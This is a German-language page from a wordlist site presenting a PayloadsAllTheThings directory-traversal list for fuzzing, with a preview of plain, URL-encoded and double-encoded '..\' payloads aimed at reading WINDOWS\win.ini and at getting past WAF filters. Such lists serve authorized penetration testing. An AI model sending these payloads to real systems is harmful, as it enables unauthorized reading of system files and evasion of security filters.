Skip to content
cyberwordlists
Fuzzing8.6 KB

Directory Traversal (PayloadsAllTheThings)

Path-/Directory-Traversal-Payloads, die auf die Windows-win.ini abzielen, mit vielen Kodierungs- und Doppelkodierungs-Varianten von ../- und Backslash-Sequenzen. Zum Testen von Path-Traversal-Filtern und WAF-Bypass.

Quelle ansehen
Größe
8.6 KB
Kategorie
Fuzzing
Quelle
swisskyrepo/PayloadsAllTheThings
Lizenz
MIT
Empfohlene Tools
ffufwfuzzburp

Vorschau

Die ersten 15 Einträge. Lade die vollständige Liste (8.6 KB) herunter oder kopiere sie über die Schaltflächen oben.

>head directory-traversal-patt.txt8.6 KB
\..\WINDOWS\win.ini
\..\..\WINDOWS\win.ini
\..\..\..\WINDOWS\win.ini
\..\..\..\..\WINDOWS\win.ini
\..\..\..\..\..\WINDOWS\win.ini
\..\..\..\..\..\..\WINDOWS\win.ini
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69
%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69
%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69
%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39

Path-/Directory-Traversal-Payloads, die auf die Windows-win.ini abzielen, mit vielen Kodierungs- und Doppelkodierungs-Varianten von ../- und Backslash-Sequenzen. Zum Testen von Path-Traversal-Filtern und WAF-Bypass.

Diese Liste ist auf Eingabe-Fuzzing und Schwachstellenfindung ausgerichtet. Sie umfasst rund 8.6 KB und harmoniert gut mit Tools wie ffuf, wfuzz, burp. Wähle die kleinste Liste, die zu deinem Auftrag passt: Kürzere Listen sind schneller und unauffälliger bei Online- Angriffen, während größere Listen eine breitere Abdeckung für Offline-Arbeit bieten, bei der Geschwindigkeit weniger eine Einschränkung darstellt.

Du kannst die Beispielvorschau direkt von dieser Seite kopieren, die gesamte Liste in deine Zwischenablage kopieren oder die rohe .txt-Datei herunterladen. Die vollständige Liste wird direkt von ihrer Ursprungsquelle auf GitHub bereitgestellt.

Bezogen von swisskyrepo/PayloadsAllTheThings und unter MIT verteilt. Verwende Wordlists nur gegen Systeme, für deren Test du ausdrücklich autorisiert bist.